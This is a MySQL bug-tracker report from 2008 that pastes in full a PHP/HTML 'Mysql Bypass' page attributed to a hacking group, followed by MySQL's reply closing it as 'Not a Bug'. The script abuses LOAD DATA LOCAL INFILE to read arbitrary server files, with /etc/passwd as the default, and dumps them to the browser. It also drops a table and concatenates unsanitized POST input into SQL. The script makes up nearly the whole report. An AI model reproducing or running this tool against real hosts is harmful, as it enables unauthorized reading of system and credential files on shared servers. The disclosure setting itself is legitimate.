MySQL Bugs: #33689: Mysql Bypass (MySQL Safe Mode Bypass Vulnerability)

Bug #33689	Mysql Bypass (MySQL Safe Mode Bypass Vulnerability)
Submitted:	4 Jan 2008 12:05	Modified:	4 Jan 2008 15:25
Reporter:	Masood Yarmohammadi	Email Updates:
Status:	Not a Bug	Impact on me:	None
Category:	MySQL Server	Severity:	S3 (Non-critical)
Version:	5.0.45-community	OS:	Any (Mysql Bypass)
Assigned to:		CPU Architecture:	Any
Tags:	bypass, MySQL, php

Description:
Hacker can bypass our mysql and view any hosted files in server with following script:

<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="keywords" content="Mysql Bypass,Ashiyane Digital Security Team ,Sha2ow">
<meta name="description" content="Mysql Bypass - Ashiyane Digital Security Team . Sha2ow">
<title>Mysql Bypass - Ashiyane Digital Security Team .</title>
</head>

<body text="#FFFFFF" bgcolor="#000000">

<p align="center">
<br>
<font face="Tahoma" style="font-size: 15pt; font-weight: 700">Ashiyane Digital Security Team<br>
Mysql Bypass <br>
</font><font face="Tahoma" size="2">4.4.7 / 5.2.3 PHP ver -&nbsp; MySQL Safe 
Mode Bypass Vulnerability<br>
only ,
Create mysql database and add user for mysql database</font><font face="Tahoma" style="font-size: 10pt; font-weight: 700"><br>
&nbsp;</font></p>
<div align="center">

<form method="post">

	<table border="0" cellspacing="1" width="859" height="6%">
		<tr>
			<td width="311"><font face="Tahoma"><span style="font-size: 9pt">&nbsp;DataBase 
			Name : <input type="text" name="dbname" size="20">&nbsp;&nbsp;&nbsp; 
			</span></font></td>
			<td width="240"><font face="Tahoma"><span style="font-size: 9pt">
			Username :&nbsp; <input type="text" name="dbuser" size="20">&nbsp;&nbsp;</span></font></td>
			<td width="298"><font face="Tahoma"><span style="font-size: 9pt">&nbsp;Password 
			:&nbsp; <input type="text" name="dbpass" size="20"></span></font></td>
		</tr>
		<tr>
			<td width="311" valign="middle">
			&nbsp;</td>
			<td width="240" valign="middle">
			&nbsp;</td>
			<td width="298" valign="middle">
			&nbsp;</td>
		</tr>
		<tr>
			<td width="554" valign="middle" colspan="2">
			<p align="left"><font face="Tahoma"><span style="font-size: 9pt">
			File Path :&nbsp;&nbsp;
			<input type="text" name="path1" size="45" style=" weight:200; height:21; width:229" dir="ltr" value="/etc/passwd">&nbsp;<input type="submit" value="Bypass" name="exec"></span></font></td>
			<td width="298" valign="middle">
			&nbsp;</td>
		</tr>
		<tr>
			<td width="855" valign="middle" colspan="3">
			<br>
			<?
if(!empty($_POST['dbname']) && !empty($_POST['dbuser']) && !empty($_POST['dbpass']) && !empty($_POST['path1'])) 
{
$dbname = $_POST['dbname'];
$dbuser = $_POST['dbuser'];
$dbpass = $_POST['dbpass'];
$path1 = $_POST['path1'];
if(mysql_connect( "localhost", $dbuser, $dbpass ))
{
$drop= "DROP TABLE $dbname.`bypass`" ;
$query = "CREATE TABLE $dbname.`bypass` (`fileview` VARCHAR( 2048 ) NOT NULL);";
mysql_query($drop);
mysql_query($query);
mysql_query("LOAD DATA LOCAL INFILE " . "'$path1'"  . " INTO TABLE " . $dbname . ".bypass");
$result =mysql_db_query($dbname,"SELECT * FROM bypass ");
$numrows = mysql_num_rows($result); 
?>

<textarea rows="15" name="result" cols="103">
<?   
while($row = mysql_fetch_array($result))   { 
echo $row[fileview] ; 

    } 
}

}

?>
</textarea></td>  	

		</tr>
	</table>
	</form>
</div>
<p align="center"><font face="Tahoma" size="2" color="#FF0000">&nbsp;Ashiyane 
Digital Security Team - Copyright Sha2ow.</font></p>

How to repeat:
How can path this?

We're sorry, but the bug system is not the appropriate forum for asking help on using MySQL products. Your problem is not the result of a bug.

Support on using our products is available both free in our forums at http://forums.mysql.com/ and for a reasonable fee direct from our skilled support engineers at http://www.mysql.com/support/

Thank you for your interest in MySQL.